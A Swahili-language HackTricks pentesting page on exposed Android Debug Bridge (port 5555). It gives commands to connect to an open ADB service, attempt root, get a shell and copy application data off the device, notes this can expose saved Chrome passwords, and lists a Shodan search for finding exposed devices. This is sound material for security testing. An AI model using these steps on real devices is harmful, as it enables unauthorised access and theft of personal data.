hacktricks/network-services-pentesting/5555-android-debug-bridge.md
2024-02-11 02:13:58 +00:00

4 KiB

5555 - Android Debug Bridge

Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

Taarifa Msingi

Kutoka nyaraka:

Android Debug Bridge (adb) ni zana ya amri yenye uwezo ambayo inakuwezesha kuwasiliana na kifaa. Amri ya adb inawezesha aina mbalimbali za vitendo vya kifaa, kama vile kusanikisha na kudukua programu, na inatoa upatikanaji wa kabati la Unix ambalo unaweza kutumia kutekeleza aina mbalimbali za amri kwenye kifaa.

Bandari ya chaguo: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Unganisha

Ikiwa utapata huduma ya ADB ikifanya kazi kwenye bandari ya kifaa na unaweza kuunganisha, unaweza kupata kikao ndani ya mfumo:

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

Kwa amri zaidi za ADB angalia ukurasa ufuatao:

{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}

Pata data ya programu

Ili kupakua kabisa data ya programu, unaweza:

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

Unaweza kutumia mbinu hii ku kupata taarifa nyeti kama nywila za Chrome. Kwa maelezo zaidi kuhusu hili angalia habari na marejeo yaliyotolewa hapa.

Shodan

  • android debug bridge
Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks: